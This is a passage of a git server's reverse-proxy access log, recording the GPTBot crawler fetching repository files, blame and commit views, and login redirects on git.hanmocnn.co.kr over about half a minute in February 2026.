- GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 10264] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:16:54:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 144] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:16:54:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 9992] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:16:54:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 13916] [Gzip 8.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:16:54:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 9980] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:16:54:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 1694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:16:54:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 10001] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:16:54:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/query" +[17/Feb/2026:16:54:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13536] [Gzip 8.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:16:54:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 1173] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:16:54:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/api_fetcher.py?display=source" [Client 74.7.227.38] [Length 12983] [Gzip 3.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/api_fetcher.py" +[17/Feb/2026:16:54:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11692] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:16:54:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/api_fetcher.py?display=source" [Client 74.7.227.38] [Length 12953] [Gzip 3.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/api_fetcher.py" +[17/Feb/2026:16:54:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11692] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:16:54:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/npm/data/logs/proxy-host-2_error.log" [Client 74.7.227.38] [Length 15552] [Gzip 7.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-2_error.log" +[17/Feb/2026:16:54:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/npm/data/logs/proxy-host-3_error.log" [Client 74.7.227.38] [Length 15484] [Gzip 7.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-3_error.log" +[17/Feb/2026:16:54:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/npm/data/logs/proxy-host-4_error.log" [Client 74.7.227.38] [Length 34608] [Gzip 13.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-4_error.log" +[17/Feb/2026:16:54:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/npm/data/logs/proxy-host-1_error.log" [Client 74.7.227.38] [Length 31349] [Gzip 16.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-1_error.log" +[17/Feb/2026:16:54:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python?follow_symlink=1" [Client 74.7.227.38] [Length 11084] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin" +[17/Feb/2026:16:54:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/npm/data/logs/proxy-host-2_access.log" [Client 74.7.227.38] [Length 40645] [Gzip 16.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-2_access.log" +[17/Feb/2026:16:54:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/npm/data/logs/proxy-host-1_access.log" [Client 74.7.227.38] [Length 142216] [Gzip 26.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-1_access.log" +[17/Feb/2026:16:54:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/logs/proxy-host-1_access.log" [Client 74.7.227.38] [Length 10631] [Gzip 4.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-1_access.log" +[17/Feb/2026:16:54:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/npm/data/logs/proxy-host-3_access.log" [Client 74.7.227.38] [Length 64488] [Gzip 18.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-3_access.log" +[17/Feb/2026:16:54:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/npm/data/logs/proxy-host-4_access.log" [Client 74.7.227.38] [Length 551096] [Gzip 22.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-4_access.log" +[17/Feb/2026:16:54:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/logs/proxy-host-3_error.log" [Client 74.7.227.38] [Length 10455] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-3_error.log" +[17/Feb/2026:16:54:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm/data/logs/proxy-host-2_error.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/proxy-host-2_error.log" +[17/Feb/2026:16:54:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm/data/logs/proxy-host-2_error.log" +[17/Feb/2026:16:54:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm/data/logs/proxy-host-3_error.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/proxy-host-3_error.log" +[17/Feb/2026:16:54:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm/data/logs/proxy-host-3_error.log" +[17/Feb/2026:16:54:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm/data/logs/proxy-host-4_error.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/proxy-host-4_error.log" +[17/Feb/2026:16:54:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm/data/logs/proxy-host-4_error.log" +[17/Feb/2026:16:54:53 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm/data/logs/proxy-host-1_error.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/proxy-host-1_error.log" +[17/Feb/2026:16:54:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm/data/logs/proxy-host-1_error.log" +[17/Feb/2026:16:54:53 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm/data/logs/proxy-host-1_error.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/proxy-host-1_error.log" +[17/Feb/2026:16:54:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm/data/logs/proxy-host-1_error.log" +[17/Feb/2026:16:54:54 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm/data/logs/proxy-host-2_access.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/proxy-host-2_access.log" +[17/Feb/2026:16:54:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm/data/logs/proxy-host-2_access.log" +[17/Feb/2026:16:54:55 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm/data/logs/proxy-host-2_error.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/proxy-host-2_error.log" +[17/Feb/2026:16:54:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm/data/logs/proxy-host-2_error.log" +[17/Feb/2026:16:54:55 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm/data/logs/proxy-host-1_access.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/proxy-host-1_access.log" +[17/Feb/2026:16:54:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm/data/logs/proxy-host-1_access.log" +[17/Feb/2026:16:54:56 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm/data/logs/proxy-host-3_access.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/proxy-host-3_access.log" +[17/Feb/2026:16:54:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm/data/logs/proxy-host-3_access.log" +[17/Feb/2026:16:54:56 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm/data/logs/proxy-host-3_error.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/proxy-host-3_error.log" +[17/Feb/2026:16:54:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm/data/logs/proxy-host-3_error.log" +[17/Feb/2026:16:54:57 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm/data/logs/proxy-host-4_access.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/proxy-host-4_access.log" +[17/Feb/2026:16:54:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm/data/logs/proxy-host-4_access.log" +[17/Feb/2026:16:54:58 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm/data/logs/proxy-host-4_error.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/proxy-host-4_error.log" +[17/Feb/2026:16:54:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm/data/logs/proxy-host-4_error.log" +[17/Feb/2026:16:54:58 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm/data/logs/proxy-host-3_access.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/proxy-host-3_access.log" +[17/Feb/2026:16:54:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm/data/logs/proxy-host-3_access.log" +[17/Feb/2026:16:54:59 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm/data/logs/proxy-host-2_access.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/proxy-host-2_access.log" +[17/Feb/2026:16:54:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm/data/logs/proxy-host-2_access.log" +[17/Feb/2026:16:54:59 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm/data/logs/proxy-host-1_access.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/proxy-host-1_access.log" +[17/Feb/2026:16:54:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm/data/logs/proxy-host-1_access.log" +[17/Feb/2026:16:55:00 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm/data/logs/proxy-host-4_access.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/proxy-host-4_access.log" +[17/Feb/2026:16:55:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm/data/logs/proxy-host-4_access.log" +[17/Feb/2026:16:55:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/logs/proxy-host-1_error.log" [Client 74.7.227.38] [Length 10455] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-1_error.log" +[17/Feb/2026:16:55:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/logs/proxy-host-2_access.log" [Client 74.7.227.38] [Length 10449] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; 